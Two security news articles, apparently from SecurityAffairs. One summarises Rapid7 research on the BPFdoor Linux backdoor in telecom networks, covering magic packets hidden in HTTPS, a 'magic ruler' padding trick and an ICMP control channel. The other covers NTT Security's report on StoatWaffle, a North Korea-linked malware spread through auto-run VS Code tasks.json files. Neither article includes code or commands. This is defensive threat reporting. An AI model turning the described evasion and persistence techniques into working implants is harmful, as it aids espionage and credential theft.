Modern telecom networks are built in layers, making them highly valuable targets. At the edge are customer-facing systems like base stations, routers, VPNs, and firewalls, which connect to the core backbone that carries massive volumes of global traffic.

Deeper inside sits the control plane, where critical systems manage subscribers, authentication, billing, and signaling using protocols like SS7 and Diameter. Much of this infrastructure runs on Linux or BSD systems, meaning a kernel-level backdoor can place attackers close to sensitive data and communication flows.

Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts. Once inside, attackers deploy tools such as CrossC2 for command execution, TinyShell for stealthy persistence, and keyloggers or brute-force tools to steal credentials and move laterally toward core systems.

A key tool is BPFdoor, a stealthy Linux backdoor that hides in the kernel and activates only when it receives a specially crafted “magic” packet.

“BPFdoor first came to broader public attention around 2021, when researchers uncovered a stealthy Linux backdoor used in long-running espionage campaigns targeting telecommunications and government networks. The BPFDoor source code reportedly leaked online in 2022, making the previously specialized Linux backdoor more accessible to other threat actors.” reads the report published by Rapid7. “Normally, BPF is used by tools like tcpdump or libpcap to capture specific network traffic, such as filtering for TCP port 443. It operates partly in kernel space, meaning it processes packets before they reach user-space applications. BPFdoor abuses this capability. Rather than binding to a visible listening port, the implant installs a custom BPF filter inside the kernel that inspects incoming packets for a specific pattern, a predefined sequence of bytes often referred to as a “magic packet” or “magic byte.” “

Like a hidden lock that opens with the right code, it leaves no visible trace, making detection extremely difficult while enabling long-term, covert access across telecom environments.

Rapid7 Labs hunted BPFdoor variants by analyzing ELF samples and grouping them by code similarity, revealing both recurring clusters and outliers. Using custom tools, they discovered new features, including a variant “F” with a 26-instruction BPF filter and updated magic packets. Some samples inspect SCTP traffic, giving attackers access to telecom signaling, subscriber data, and location tracking. Other tactics include mimicking bare-metal servers like HPE ProLiant or container services such as Docker to blend into telecom hardware and 5G core environments. These strategies allow implants to remain hidden while embedding directly into the backbone, turning persistence into deep visibility across critical networks.

According to Rapid7, recent BPFdoor variants show significant evolution in stealth and control. Instead of simple magic packets, triggers are now hidden inside legitimate HTTPS traffic, passing through proxies, load balancers, and firewalls.

A clever padding mechanism, called the 26- or 40-byte “magic ruler,” ensures the activation marker lands at a fixed offset, surviving header changes. The malware also uses lightweight RC4-MD5 encryption for fast command execution and reuses proven routines from prior Chinese-linked malware. ICMP packets are used as a small control channel between infected systems. A special marker (0xFFFFFFFF) tells the receiving host to execute commands, letting attackers manage multiple compromised servers quietly across telecom and enterprise networks.

“BPFdoor and new eBPF malware families like Symbiote demonstrate how kernel packet filtering can be abused for stealth persistence. As defenders improve visibility at higher layers, adversaries are increasingly shifting implants deeper into the operating system.” concludes the report that provides Indicators of Compromise (IoCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, telecom)

North Korea-linked threat actors use VS Code auto-run tasks to spread StoatWaffle malware via malicious projects that execute on folder open.

North Korea-linked threat actor Team 8 behind the Contagious Interview campaign is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, they have abused the “tasks.json” auto-run feature in Microsoft Visual Studio Code to execute code whenever a folder is opened, downloading payloads from the web across operating systems, making this tactic both stealthy and effective.

“In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.” reads the report published by NTT Security. “Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode directory that contains tasks.json file. If a user opens and trusts this malicious reporitory with VSCode, it reads this tasks.json file.”

The task downloads payloads from Vercel and runs them via cmd.exe, starting with a simple downloader. It then installs Node.js if missing and fetches additional files, enabling further malware execution across operating systems.

The StoatWaffle malware uses a multi-stage infection chain. It begins with a Node.js loader that repeatedly connects to a command-and-control (C2) server and executes any code it receives. A second downloader is then deployed, continuing this communication and quickly delivering additional malware modules.

One module acts as a stealer, collecting credentials from browsers, extension data, installed software details, and even macOS Keychain data, then sending everything back to the attacker. It can also access Windows data through WSL environments.

“Stealer module thefts credentials stored on Web browsers and designated browser extension data and uploads them to C2 server. If the victim browser was Chromium family, it steals browser extension data (Appendix) besides stored credentials. If the victim browser was Firefox, it steals browser extension data besides stored credentials. It reads extensions.json and gets the list of browser extension names, then checks whether designated keyword is included.” continues the report. “If the victim OS was macOS, it also steals Keychain database.”

Another module works as a remote access trojan (RAT), allowing attackers to run commands on the infected system and receive results. Overall, the malware enables full data theft and remote control of compromised devices.

“StoatWaffle is a modular malware implemeted by Node.js and it has Stealer and RAT modules. WaterPlum is continuously developing new malware and updating existing ones. We think it necessary to pay close attention to their activities.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, StoatWaffle)